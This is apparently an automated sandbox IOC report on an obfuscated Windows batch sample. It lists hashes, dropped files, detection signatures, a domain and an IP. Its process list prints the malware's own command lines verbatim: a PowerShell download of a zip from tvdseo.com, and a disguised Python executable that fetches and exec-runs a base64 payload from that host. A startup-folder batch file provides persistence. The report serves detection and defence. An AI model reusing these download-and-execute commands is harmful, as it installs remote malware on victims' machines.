Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

wzvdwjAw2x.bat

Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators

initial sample

Details

Filetype:	Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
Entropy:	5.554526475106878
Filename:	wzvdwjAw2x.bat
Filesize:	161508
MD5:	fd12c98ca2aa9e0ef629795ea41d2ab9
SHA1:	a64b8bb2d154d0f5b987e042097b0039be6b58a0
SHA256:	b4d812205f556d567353f2d29a8179803949b6c25d0de7840052e161a625370d
SHA512:	97249651a30ccaa9121e87c1d25df59ab78c2e7c98227ab075561b1f89c5e948553cfaae41fb3f3522b5c4c07b744e15023938d30d22994f0506d9c460814427
SSDEEP:	3072:84MF1ZWCEB3QLkU7lWoJx+aBxW9SVX/abLnHY6wuUPG/1bFaUUlvGqtud/9A3:7MFqCk3YQCy9SVX/eLn49PedbYOBA3
Preview:	..%eqyIQTrf%>%UWsXMfoRq%%JdwlWaeq%n%MtVdQjS%%fZIjINZ%u%srvEEpBjS%%lZAtvttB%l%UPJmIAif% %tmIJyDQW%2%HaiHyYSB%%KqdxbIm%>%McGoxwwpR%%FeYvTtcSI%&%CuRWOmiPu%%ghUHvEEXt%1%SPaBOjaL% %pmMHDMqI%&%aMlDdJdF%%iwlykvhY%&%cTGLrjAAq% %zDXALuf%e%RbcjjDhD%%ZBCCKth%x%fBKuy

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.bat

ASCII text, with CRLF line terminators

modified

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.bat
Category:	modified
Dump:	WindowsSecurity.bat.0.dr
ID:	dr_0
Target ID:	0
Process:	C:\Windows\System32\cmd.exe
Type:	ASCII text, with CRLF line terminators
Entropy:	5.083986668846356
Encrypted:	false
Ssdeep:	6:fwAwWDyFsHg2kiyCuW8QwZ21TWk6N8rycQ7a9Cy:f5jOFsTv8/5km8rycQ7hy
Size:	221
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Drops script at startup location	Data Obfuscation
Drops script or batch files to the startup folder	Boot Survival	Scripting
Creates a start menu entry (Start Menu\Programs\Startup)	Boot Survival	Registry Run Keys / Startup Folder
Stores files to the Windows start menu directory	Boot Survival	Registry Run Keys / Startup Folder
Creates files inside the user directory	System Summary	Masquerading
Spawns processes	System Summary	Process Injection

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Category:	dropped
Dump:	StartupProfileData-Interactive.4.dr
ID:	dr_6
Target ID:	4
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	5.4726777344354876
Encrypted:	false
Ssdeep:	48:FAzsSU4y4RQmFoUeCamfm9qr9t5/78NQN+4GxJZKaVEouYAgwd64rHLjtvg:FAzlHyIFKL2O9qrh7K1J5Eo9Adrxg
Size:	2992
Whitelisted:	false
Reputation:	low

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05uk35j0.nxa.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05uk35j0.nxa.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_05uk35j0.nxa.psm1.4.dr
ID:	dr_4
Target ID:	4
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	timeout

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b52jsqlr.ntp.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b52jsqlr.ntp.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_b52jsqlr.ntp.ps1.4.dr
ID:	dr_3
Target ID:	4
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Creates temporary files	System Summary

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfbboglc.2km.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfbboglc.2km.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_bfbboglc.2km.psm1.6.dr
ID:	dr_7
Target ID:	6
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	timeout

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kaatyvha.a3f.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kaatyvha.a3f.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_kaatyvha.a3f.ps1.6.dr
ID:	dr_9
Target ID:	6
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	timeout

\Device\ConDrv

ASCII text, with CRLF line terminators

dropped

Details

File:	\Device\ConDrv
Category:	dropped
Dump:	ConDrv.6.dr
ID:	dr_8
Target ID:	6
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with CRLF line terminators
Entropy:	5.128642887292626
Encrypted:	false
Ssdeep:	3:I+tIqahg7WsqWVAX9S/eE2cWR5sqWVALJAsYCGqmRPljWKaHD9PYcFLWKaHD9P0:IaIdg/qWVANn0rqWVA1pGtPgfj9gVfjO
Size:	175
Whitelisted:	false
Reputation:	timeout

\Device\Null

ASCII text, with CRLF line terminators

dropped

Details

File:	\Device\Null
Category:	dropped
Dump:	Null.2.dr
ID:	dr_2
Target ID:	2
Process:	C:\Windows\System32\chcp.com
Type:	ASCII text, with CRLF line terminators
Entropy:	4.103465189601646
Encrypted:	false
Ssdeep:	3:PHsEiV/:PsES
Size:	25
Whitelisted:	false
Reputation:	timeout

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\wzvdwjAw2x.bat" "

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', 'C:\Users\Public\Szhr3IbIFi.zip') "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Szhr3IbIFi.zip', 'C:/Users/Public/Szhr3IbIFi') "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\cmd.exe

cmd.exe /c start "" /min C:\Users\Public\Szhr3IbIFi\synaptics.exe -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://tvdseo.com/file/Adonis/Adonis_Bot').read().decode('utf-8')))"

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.bat" "

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\chcp.com

chcp 65001

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name

Malicious

https://tvdseo.com/file/Adonis/Adonis_Bot

unknown

Details

Name:	https://tvdseo.com/file/Adonis/Adonis_Bot
TargetID:	0
From Memory:	true
Current Path:	C:\Windows\System32\cmd.exe
Source:	WindowsSecurity.bat.0.dr

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

https://tvdseo.com/file/synaptics.zip

172.67.189.157

Details

Name:	https://tvdseo.com/file/synaptics.zip
IP:	172.67.189.157
TargetID:	4
From Memory:	false
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

Domains

Name

Malicious

tvdseo.com

172.67.189.157

Details

Name:	tvdseo.com
IP:	172.67.189.157
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

172.67.189.157

tvdseo.com

United States

Details

IP:	172.67.189.157
TargetID:	4
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	tvdseo.com

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob